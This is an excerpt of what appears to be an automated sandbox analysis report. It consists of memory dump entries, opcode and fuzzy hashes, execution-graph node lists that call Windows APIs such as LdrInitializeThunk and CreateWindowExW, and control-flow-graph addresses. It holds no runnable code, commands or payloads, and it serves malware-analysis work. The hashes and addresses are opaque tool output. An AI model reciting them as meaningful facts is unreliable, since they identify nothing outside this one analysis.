                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 051dc9397a38eaa5bf1e13b6fdc5c5e62fa09eabe0756f726993d6ec79cd6e35
                                                                                                                                  • Instruction ID: c594296c4d898c4fbefa64e605570c5047d0cd776bfee145d6d40305655d5bed
                                                                                                                                  • Opcode Fuzzy Hash: 051dc9397a38eaa5bf1e13b6fdc5c5e62fa09eabe0756f726993d6ec79cd6e35
                                                                                                                                  • Instruction Fuzzy Hash: F01293B24217458AD730CF65E96C2893BB1BB41328B924319D2712F6E9FBB4164FEF44
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4646828622.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_1280000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 886aa5509c5dd3ac6d72e93f2f6c08103a0e132a6712a6a635a602c03f4fafe4
                                                                                                                                  • Instruction ID: f084a368fc7692e70eded1a1050c6054cdcc468998f99952ca1e9639a276302d
                                                                                                                                  • Opcode Fuzzy Hash: 886aa5509c5dd3ac6d72e93f2f6c08103a0e132a6712a6a635a602c03f4fafe4
                                                                                                                                  • Instruction Fuzzy Hash: 7EA1B332E11216CFCF19EFB4C9445AEBBB2FF84300B25416AE901AF295DB71E916CB40
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e829f739e66a098e754075e458b297097de3136cde59ffda451b3cb88e26e3a8
                                                                                                                                  • Instruction ID: 8b171ce8a0f53c6f2b1242b5f06ecf550b5d7734521b7c0105cf311e88e40b0a
                                                                                                                                  • Opcode Fuzzy Hash: e829f739e66a098e754075e458b297097de3136cde59ffda451b3cb88e26e3a8
                                                                                                                                  • Instruction Fuzzy Hash: 93819074B00258CBDB1CEB79986467EBBB7BFC8750F058529E417EB288CF3588029795
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4650208002.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_5350000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e19796a514c08d616480800c640321d2c74b00439b70344886634073f8780ea2
                                                                                                                                  • Instruction ID: 66972476e8b0ed7c0f9e6ccdcb8aef733f96a2033adaa6f5aa4a479b3365b415
                                                                                                                                  • Opcode Fuzzy Hash: e19796a514c08d616480800c640321d2c74b00439b70344886634073f8780ea2
                                                                                                                                  • Instruction Fuzzy Hash: C4C127B28217458BD720CF25E8682893BB1BB85324F564319D1716F2E9FBB4264FEF44

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:15.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                  Signature Coverage:1.9%
                                                                                                                                  Total number of Nodes:215
                                                                                                                                  Total number of Limit Nodes:8
                                                                                                                                  execution_graph 30994 134d044 30995 134d05c 30994->30995 30996 134d0b6 30995->30996 31001 10a6fc8 30995->31001 31005 10a42f4 30995->31005 31009 10a6fc1 30995->31009 31013 10a7d19 30995->31013 31002 10a6fee 31001->31002 31003 10a42f4 CallWindowProcW 31002->31003 31004 10a700f 31003->31004 31004->30996 31007 10a42ff 31005->31007 31008 10a7d79 31007->31008 31017 10a441c CallWindowProcW 31007->31017 31010 10a6fee 31009->31010 31011 10a42f4 CallWindowProcW 31010->31011 31012 10a700f 31011->31012 31012->30996 31014 10a7d22 31013->31014 31016 10a7d79 31014->31016 31018 10a441c CallWindowProcW 31014->31018 31017->31008 31018->31016 30775 139e018 30776 139e024 30775->30776 30807 556295a 30776->30807 30812 55628dd 30776->30812 30817 55628d1 30776->30817 30822 5562911 30776->30822 30827 55628d5 30776->30827 30832 5562915 30776->30832 30837 5562919 30776->30837 30842 5562905 30776->30842 30847 55628e9 30776->30847 30852 5562968 30776->30852 30857 55628ed 30776->30857 30862 55628e1 30776->30862 30867 556290d 30776->30867 30872 55628f9 30776->30872 30877 55628bd 30776->30877 30882 55628fd 30776->30882 30887 55628f1 30776->30887 30892 55628f5 30776->30892 30897 55628c9 30776->30897 30902 5562909 30776->30902 30907 55628e5 30776->30907 30912 55628cd 30776->30912 30917 55628c1 30776->30917 30922 5562901 30776->30922 30927 55628c5 30776->30927 30932 55628d9 30776->30932 30777 139e0c3 30937 556fc68 30777->30937 30941 556fc5b 30777->30941 30778 139e61f 30808 5562928 30807->30808 30808->30807 30809 5562a56 30808->30809 30945 556992c 30808->30945 30949 5569548 30808->30949 30809->30777 30813 556291d 30812->30813 30814 5562a56 30813->30814 30815 556992c LdrInitializeThunk 30813->30815 30816 5569548 LdrInitializeThunk 30813->30816 30814->30777 30815->30814 30816->30814 30818 556291d 30817->30818 30819 5562a56 30818->30819 30820 556992c LdrInitializeThunk 30818->30820 30821 5569548 LdrInitializeThunk 30818->30821 30819->30777 30820->30819 30821->30819 30823 556291d 30822->30823 30824 5562a56 30823->30824 30825 556992c LdrInitializeThunk 30823->30825 30826 5569548 LdrInitializeThunk 30823->30826 30824->30777 30825->30824 30826->30824 30828 556291d 30827->30828 30829 5562a56 30828->30829 30830 556992c LdrInitializeThunk 30828->30830 30831 5569548 LdrInitializeThunk 30828->30831 30829->30777 30830->30829 30831->30829 30834 556291d 30832->30834 30833 5562a56 30833->30777 30834->30833 30835 556992c LdrInitializeThunk 30834->30835 30836 5569548 LdrInitializeThunk 30834->30836 30835->30833 30836->30833 30839 556291d 30837->30839 30838 5562a56 30838->30777 30839->30838 30840 556992c LdrInitializeThunk 30839->30840 30841 5569548 LdrInitializeThunk 30839->30841 30840->30838 30841->30838 30843 556291d 30842->30843 30844 5562a56 30843->30844 30845 556992c LdrInitializeThunk 30843->30845 30846 5569548 LdrInitializeThunk 30843->30846 30844->30777 30845->30844 30846->30844 30848 556291d 30847->30848 30849 5562a56 30848->30849 30850 556992c LdrInitializeThunk 30848->30850 30851 5569548 LdrInitializeThunk 30848->30851 30849->30777 30850->30849 30851->30849 30853 556298a 30852->30853 30854 5562a56 30853->30854 30855 556992c LdrInitializeThunk 30853->30855 30856 5569548 LdrInitializeThunk 30853->30856 30854->30777 30855->30854 30856->30854 30858 556291d 30857->30858 30859 5562a56 30858->30859 30860 556992c LdrInitializeThunk 30858->30860 30861 5569548 LdrInitializeThunk 30858->30861 30859->30777 30860->30859 30861->30859 30863 556291d 30862->30863 30864 5562a56 30863->30864 30865 556992c LdrInitializeThunk 30863->30865 30866 5569548 LdrInitializeThunk 30863->30866 30864->30777 30865->30864 30866->30864 30868 556291d 30867->30868 30869 5562a56 30868->30869 30870 556992c LdrInitializeThunk 30868->30870 30871 5569548 LdrInitializeThunk 30868->30871 30869->30777 30870->30869 30871->30869 30873 556291d 30872->30873 30874 5562a56 30873->30874 30875 556992c LdrInitializeThunk 30873->30875 30876 5569548 LdrInitializeThunk 30873->30876 30874->30777 30875->30874 30876->30874 30878 556291d 30877->30878 30879 5562a56 30878->30879 30880 556992c LdrInitializeThunk 30878->30880 30881 5569548 LdrInitializeThunk 30878->30881 30879->30777 30880->30879 30881->30879 30884 556291d 30882->30884 30883 5562a56 30883->30777 30884->30883 30885 556992c LdrInitializeThunk 30884->30885 30886 5569548 LdrInitializeThunk 30884->30886 30885->30883 30886->30883 30888 556291d 30887->30888 30889 5562a56 30888->30889 30890 556992c LdrInitializeThunk 30888->30890 30891 5569548 LdrInitializeThunk 30888->30891 30889->30777 30890->30889 30891->30889 30893 556291d 30892->30893 30894 5562a56 30893->30894 30895 556992c LdrInitializeThunk 30893->30895 30896 5569548 LdrInitializeThunk 30893->30896 30894->30777 30895->30894 30896->30894 30899 556291d 30897->30899 30898 5562a56 30898->30777 30899->30898 30900 556992c LdrInitializeThunk 30899->30900 30901 5569548 LdrInitializeThunk 30899->30901 30900->30898 30901->30898 30903 556291d 30902->30903 30904 5562a56 30903->30904 30905 556992c LdrInitializeThunk 30903->30905 30906 5569548 LdrInitializeThunk 30903->30906 30904->30777 30905->30904 30906->30904 30908 556291d 30907->30908 30909 5562a56 30908->30909 30910 556992c LdrInitializeThunk 30908->30910 30911 5569548 LdrInitializeThunk 30908->30911 30909->30777 30910->30909 30911->30909 30913 556291d 30912->30913 30914 5562a56 30913->30914 30915 556992c LdrInitializeThunk 30913->30915 30916 5569548 LdrInitializeThunk 30913->30916 30914->30777 30915->30914 30916->30914 30918 556291d 30917->30918 30919 5562a56 30918->30919 30920 556992c LdrInitializeThunk 30918->30920 30921 5569548 LdrInitializeThunk 30918->30921 30919->30777 30920->30919 30921->30919 30923 556291d 30922->30923 30924 5562a56 30923->30924 30925 556992c LdrInitializeThunk 30923->30925 30926 5569548 LdrInitializeThunk 30923->30926 30924->30777 30925->30924 30926->30924 30929 556291d 30927->30929 30928 5562a56 30928->30777 30929->30928 30930 556992c LdrInitializeThunk 30929->30930 30931 5569548 LdrInitializeThunk 30929->30931 30930->30928 30931->30928 30933 556291d 30932->30933 30934 5562a56 30933->30934 30935 556992c LdrInitializeThunk 30933->30935 30936 5569548 LdrInitializeThunk 30933->30936 30934->30777 30935->30934 30936->30934 30938 556fc69 30937->30938 30939 5569548 LdrInitializeThunk 30938->30939 30940 556fd3a 30938->30940 30939->30940 30940->30778 30942 556fc68 30941->30942 30943 5569548 LdrInitializeThunk 30942->30943 30944 556fd3a 30942->30944 30943->30944 30944->30778 30946 55697e3 30945->30946 30947 5569a69 LdrInitializeThunk 30946->30947 30948 5569a81 30947->30948 30948->30809 30952 5569579 30949->30952 30950 55696d9 30950->30809 30951 5569a69 LdrInitializeThunk 30951->30950 30952->30950 30952->30951 31019 10a953b 31020 10a9542 31019->31020 31021 10a964c 31020->31021 31022 10a95a2 31020->31022 31024 10a42f4 CallWindowProcW 31021->31024 31023 10a95fa CallWindowProcW 31022->31023 31025 10a95a9 31022->31025 31023->31025 31024->31025 30953 10a4968 30955 10a4999 30953->30955 30956 10a4a99 30953->30956 30954 10a49a5 30955->30954 30962 10a4bd0 30955->30962 30965 10a4be0 30955->30965 30957 10a49e5 30968 10a5ecf 30957->30968 30973 10a5ee0 30957->30973 30978 10a4c28 30962->30978 30963 10a4bea 30963->30957 30966 10a4bea 30965->30966 30967 10a4c28 GetModuleHandleW 30965->30967 30966->30957 30967->30966 30969 10a5f0b 30968->30969 30970 10a5fba 30969->30970 30983 10a6dc0 30969->30983 30986 10a6cb0 30969->30986 30974 10a5f0b 30973->30974 30975 10a5fba 30974->30975 30976 10a6dc0 CreateWindowExW 30974->30976 30977 10a6cb0 CreateWindowExW 30974->30977 30976->30975 30977->30975 30979 10a4c64 30978->30979 30980 10a4c41 30978->30980 30979->30963 30980->30979 30981 10a4e68 GetModuleHandleW 30980->30981 30982 10a4e95 30981->30982 30982->30963 30990 10a42cc 30983->30990 30987 10a6cb7 30986->30987 30987->30987 30988 10a6df5 30987->30988 30989 10a42cc CreateWindowExW 30987->30989 30988->30970 30989->30988 30991 10a6e10 CreateWindowExW 30990->30991 30993 10a6f34 30991->30993 31026 10ab718 31027 10ab740 31026->31027 31030 10ab76c 31026->31030 31028 10ab749 31027->31028 31031 10aac1c 31027->31031 31032 10aac27 31031->31032 31033 10aba63 31032->31033 31035 10aac38 31032->31035 31033->31030 31036 10aba98 OleInitialize 31035->31036 31037 10abafc 31036->31037 31037->31033

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 985 5569548-5569577 986 556957e-5569614 985->986 987 5569579 985->987 989 55696b3-55696b9 986->989 987->986 990 55696bf-55696d7 989->990 991 5569619-556962c 989->991 992 55696eb-55696fe 990->992 993 55696d9-55696e6 990->993 994 5569633-5569684 991->994 995 556962e 991->995 997 5569705-5569721 992->997 998 5569700 992->998 996 5569a81-5569b7e 993->996 1012 5569686-5569694 994->1012 1013 5569697-55696a9 994->1013 995->994 1003 5569b86-5569b90 996->1003 1004 5569b80-5569b85 996->1004 1000 5569723 997->1000 1001 5569728-556974c 997->1001 998->997 1000->1001 1007 5569753-5569785 1001->1007 1008 556974e 1001->1008 1004->1003 1017 5569787 1007->1017 1018 556978c-55697ce 1007->1018 1008->1007 1012->990 1014 55696b0 1013->1014 1015 55696ab 1013->1015 1014->989 1015->1014 1017->1018 1020 55697d5-55697de 1018->1020 1021 55697d0 1018->1021 1022 5569a06-5569a0c 1020->1022 1021->1020 1023 5569a12-5569a25 1022->1023 1024 55697e3-5569808 1022->1024 1027 5569a27 1023->1027 1028 5569a2c-5569a47 1023->1028 1025 556980f-5569846 1024->1025 1026 556980a 1024->1026 1036 556984d-556987f 1025->1036 1037 5569848 1025->1037 1026->1025 1027->1028 1029 5569a4e-5569a62 1028->1029 1030 5569a49 1028->1030 1034 5569a64 1029->1034 1035 5569a69-5569a7f LdrInitializeThunk 1029->1035 1030->1029 1034->1035 1035->996 1039 55698e3-55698f6 1036->1039 1040 5569881-55698a6 1036->1040 1037->1036 1041 55698fd-5569922 1039->1041 1042 55698f8 1039->1042 1043 55698ad-55698db 1040->1043 1044 55698a8 1040->1044 1047 5569924-5569925 1041->1047 1048 5569931-5569969 1041->1048 1042->1041 1043->1039 1044->1043 1047->1023 1049 5569970-55699d1 call 5569328 1048->1049 1050 556996b 1048->1050 1056 55699d3 1049->1056 1057 55699d8-55699fc 1049->1057 1050->1049 1056->1057 1060 5569a03 1057->1060 1061 55699fe 1057->1061 1060->1022 1061->1060
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 81c3cd0c473fcc04a8b4c7a1ed6a0d19d6a9c619e55e53c0f55fb2dc361d4145
                                                                                                                                  • Instruction ID: c6a1296666ffc17e8dfbb916d9e4636915c3225f799d2d5f4c7fcd4a4eb56d0a
                                                                                                                                  • Opcode Fuzzy Hash: 81c3cd0c473fcc04a8b4c7a1ed6a0d19d6a9c619e55e53c0f55fb2dc361d4145
                                                                                                                                  • Instruction Fuzzy Hash: 7FF1D374E01258DFDB24DFA9C884B9DBBF2BF88304F1481A9D848AB355DB749986CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9ea26f7d812d115eacfcd5d6743fd6343254af008484ac0eb2f5a772f82365e3
                                                                                                                                  • Instruction ID: 690033d06a6e3849b22d9b04e57fe960e5a04481b46b356a9ee063a52f799970
                                                                                                                                  • Opcode Fuzzy Hash: 9ea26f7d812d115eacfcd5d6743fd6343254af008484ac0eb2f5a772f82365e3
                                                                                                                                  • Instruction Fuzzy Hash: 9BA27E30A0020ADFDF15CF68C584AAEBBF6BF88318F158669E505DB3A5D735E881CB51

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1673 5560b30-5560b50 1675 5560b57-5560bd9 1673->1675 1676 5560b52 1673->1676 1678 5560c3e-5560c54 1675->1678 1676->1675 1679 5560c56-5560ca0 1678->1679 1680 5560bdb-5560be4 1678->1680 1687 5560ca2-5560ce3 1679->1687 1688 5560d0b-5560d0c 1679->1688 1681 5560be6 1680->1681 1682 5560beb-5560c34 1680->1682 1681->1682 1689 5560c36 1682->1689 1690 5560c3b 1682->1690 1695 5560d05-5560d06 1687->1695 1696 5560ce5-5560d03 1687->1696 1691 5560d0d-5560d3e 1688->1691 1689->1690 1690->1678 1697 5560d45-5560dac 1691->1697 1698 5560d07-5560d09 1695->1698 1696->1698 1703 5560db2-5560dd3 1697->1703 1704 55616fe-5561733 1697->1704 1698->1691 1707 55616db-55616f7 1703->1707 1708 55616fd 1707->1708 1709 5560dd8-5560de1 1707->1709 1708->1704 1710 5560de3 1709->1710 1711 5560de8-5560e4e 1709->1711 1710->1711 1715 5560e55-5560edf 1711->1715 1716 5560e50 1711->1716 1722 5560ef1-5560ef8 1715->1722 1723 5560ee1-5560ee8 1715->1723 1716->1715 1724 5560eff-5560f0c 1722->1724 1725 5560efa 1722->1725 1726 5560eef 1723->1726 1727 5560eea 1723->1727 1728 5560f13-5560f1a 1724->1728 1729 5560f0e 1724->1729 1725->1724 1726->1724 1727->1726 1730 5560f21-5560f78 1728->1730 1731 5560f1c 1728->1731 1729->1728 1734 5560f7f-5560f96 1730->1734 1735 5560f7a 1730->1735 1731->1730 1736 5560fa1-5560fa9 1734->1736 1737 5560f98-5560f9f 1734->1737 1735->1734 1738 5560faa-5560fb4 1736->1738 1737->1738 1739 5560fb6 1738->1739 1740 5560fbb-5560fc4 1738->1740 1739->1740 1741 55616ab-55616b1 1740->1741 1742 55616b7-55616d1 1741->1742 1743 5560fc9-5560fd5 1741->1743 1752 55616d3 1742->1752 1753 55616d8 1742->1753 1744 5560fd7 1743->1744 1745 5560fdc-5560fe1 1743->1745 1744->1745 1746 5561024-5561026 1745->1746 1747 5560fe3-5560fef 1745->1747 1749 556102c-5561040 1746->1749 1750 5560ff6-5560ffb 1747->1750 1751 5560ff1 1747->1751 1754 5561046-556105b 1749->1754 1755 5561689-5561696 1749->1755 1750->1746 1756 5560ffd-556100a 1750->1756 1751->1750 1752->1753 1753->1707 1759 5561062-55610e8 1754->1759 1760 556105d 1754->1760 1761 5561697-55616a1 1755->1761 1757 5561011-5561022 1756->1757 1758 556100c 1756->1758 1757->1749 1758->1757 1768 5561112 1759->1768 1769 55610ea-5561110 1759->1769 1760->1759 1762 55616a3 1761->1762 1763 55616a8 1761->1763 1762->1763 1763->1741 1770 556111c-556113c 1768->1770 1769->1770 1772 5561142-556114c 1770->1772 1773 55612bb-55612c0 1770->1773 1774 5561153-556117c 1772->1774 1775 556114e 1772->1775 1776 5561324-5561326 1773->1776 1777 55612c2-55612e2 1773->1777 1779 5561196-5561198 1774->1779 1780 556117e-5561188 1774->1780 1775->1774 1778 556132c-556134c 1776->1778 1790 55612e4-556130a 1777->1790 1791 556130c 1777->1791 1781 5561352-556135c 1778->1781 1782 5561683-5561684 1778->1782 1786 5561237-5561246 1779->1786 1784 556118f-5561195 1780->1784 1785 556118a 1780->1785 1787 5561363-556138c 1781->1787 1788 556135e 1781->1788 1789 5561685-5561687 1782->1789 1784->1779 1785->1784 1792 556124d-5561252 1786->1792 1793 5561248 1786->1793 1796 55613a6-55613b4 1787->1796 1797 556138e-5561398 1787->1797 1788->1787 1789->1761 1798 5561316-5561322 1790->1798 1791->1798 1794 5561254-5561264 1792->1794 1795 556127c-556127e 1792->1795 1793->1792 1799 5561266 1794->1799 1800 556126b-556127a 1794->1800 1801 5561284-5561298 1795->1801 1804 5561453-5561462 1796->1804 1802 556139f-55613a5 1797->1802 1803 556139a 1797->1803 1798->1778 1799->1800 1800->1801 1806 556129e-55612b6 1801->1806 1807 556119d-55611b8 1801->1807 1802->1796 1803->1802 1808 5561464 1804->1808 1809 5561469-556146e 1804->1809 1806->1789 1810 55611bf-5561229 1807->1810 1811 55611ba 1807->1811 1808->1809 1812 5561470-5561480 1809->1812 1813 5561498-556149a 1809->1813 1830 5561230-5561236 1810->1830 1831 556122b 1810->1831 1811->1810 1815 5561487-5561496 1812->1815 1816 5561482 1812->1816 1814 55614a0-55614b4 1813->1814 1817 55614ba-5561523 1814->1817 1818 55613b9-55613d4 1814->1818 1815->1814 1816->1815 1828 5561525-5561527 1817->1828 1829 556152c-556167f 1817->1829 1820 55613d6 1818->1820 1821 55613db-5561445 1818->1821 1820->1821 1835 5561447 1821->1835 1836 556144c-5561452 1821->1836 1832 5561680-5561681 1828->1832 1829->1832 1830->1786 1831->1830 1832->1742 1835->1836 1836->1804
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0c222c52163246563c6885b57fafa144fd0427b0351704966df84b4d543d2a01
                                                                                                                                  • Instruction ID: 6ea045772e52f179a6a44ffa505e80b82799a7734d45f27cb179131651d8b7bd
                                                                                                                                  • Opcode Fuzzy Hash: 0c222c52163246563c6885b57fafa144fd0427b0351704966df84b4d543d2a01
                                                                                                                                  • Instruction Fuzzy Hash: 1F72AB74E052698FDB64DF69C984BEDBBB2BB49300F1481E9D409A7361EB349E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 435a36dcb6ce4619f9cd87cd92b3ff026d1c94e2c88274fad5e406b3280625bc
                                                                                                                                  • Instruction ID: ab82c3f471a464a46f31eb63c7295705f694b84e723cf7c0ecf4104a0dbed029
                                                                                                                                  • Opcode Fuzzy Hash: 435a36dcb6ce4619f9cd87cd92b3ff026d1c94e2c88274fad5e406b3280625bc
                                                                                                                                  • Instruction Fuzzy Hash: 5A129DB0A002198FDB15DF69C854BAEBBF6FF88304F208169E51ADB395DB349D45CB90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2dab01ae8a1f5f33c7c59a03aa15714edcf790a85ccdf89835bf1fa0305a6c75
                                                                                                                                  • Instruction ID: 1ec8ca043a9e4f7707112ff3a64e47a325c531e9b33fd94209cd46e335b5d7b5
                                                                                                                                  • Opcode Fuzzy Hash: 2dab01ae8a1f5f33c7c59a03aa15714edcf790a85ccdf89835bf1fa0305a6c75
                                                                                                                                  • Instruction Fuzzy Hash: 8502F431906795CFCB638F78C46425ABFF1FF4A329B2444FDC4428A622E7365892CB52
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1c2805adbbbd7eb0fa1831a3bfc8aeb481caf505418e692d6eed783ca6e6d7d4
                                                                                                                                  • Instruction ID: 14a19051b608534d0889f829087e61f8495f771151946a3ffbba0534ec036c51
                                                                                                                                  • Opcode Fuzzy Hash: 1c2805adbbbd7eb0fa1831a3bfc8aeb481caf505418e692d6eed783ca6e6d7d4
                                                                                                                                  • Instruction Fuzzy Hash: 44024C70A10219DFDF15CF69C884AAEBBB6BF88318F158069E945AB2A1D734DD41CF90
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9aedb05b41c70384a29181986b310215d272384f8a78305402358811026b05ed
                                                                                                                                  • Instruction ID: 36dc33b1a64aadcbf07a4d71ca8fb330a8fbf5ca3ccd3e294c21c9613a2c9217
                                                                                                                                  • Opcode Fuzzy Hash: 9aedb05b41c70384a29181986b310215d272384f8a78305402358811026b05ed
                                                                                                                                  • Instruction Fuzzy Hash: 30C19D74E01219CFDB24DFA9C984B9DBBB6BF89304F1081A9D809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 700095c5a938c6ae4738e884ceab95855d3a371f0f536404236f0e71c01f62f2
                                                                                                                                  • Instruction ID: eda2e43c0f763aec8da4ddef806448930e31aec3cc66381fbee5289635192642
                                                                                                                                  • Opcode Fuzzy Hash: 700095c5a938c6ae4738e884ceab95855d3a371f0f536404236f0e71c01f62f2
                                                                                                                                  • Instruction Fuzzy Hash: 76C18E78E01219CFDB64DFA5C944B9DBBB2FB89304F1081A9D809AB355DB359E81CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 626d74711ce1f04f75e98484f3d2cf49ed009d4ce106d7fcd0dd5d61153f9c66
                                                                                                                                  • Instruction ID: 5b66d7ae2e7e81892559f7925509d7d1baf7be56195965f8db62c3215232dacd
                                                                                                                                  • Opcode Fuzzy Hash: 626d74711ce1f04f75e98484f3d2cf49ed009d4ce106d7fcd0dd5d61153f9c66
                                                                                                                                  • Instruction Fuzzy Hash: 68A10574E00218DFEB14DFAAD884A9DBBF2BF89314F14906AE408EB365DB359941CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b28a0b9d7e9d1cc7e7ff079f0e889f5fc99cef6c62a00999484eb6798752d409
                                                                                                                                  • Instruction ID: df9b8a30b970e616e9258912cd8330690e01fc4c8190846836857329cbbc2023
                                                                                                                                  • Opcode Fuzzy Hash: b28a0b9d7e9d1cc7e7ff079f0e889f5fc99cef6c62a00999484eb6798752d409
                                                                                                                                  • Instruction Fuzzy Hash: 05A11470E00209CFEB24DFA9C848BADBBB1FF88314F209269D509A7395DB759985CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 215ac5a80f609d07e1f16297ff51c57a1cf4deebee496b613012e6752ac98077
                                                                                                                                  • Instruction ID: c6d4eb525d04e54a7b3164b231f97ecbadcaa3869d13af280a9ebf2d291969c1
                                                                                                                                  • Opcode Fuzzy Hash: 215ac5a80f609d07e1f16297ff51c57a1cf4deebee496b613012e6752ac98077
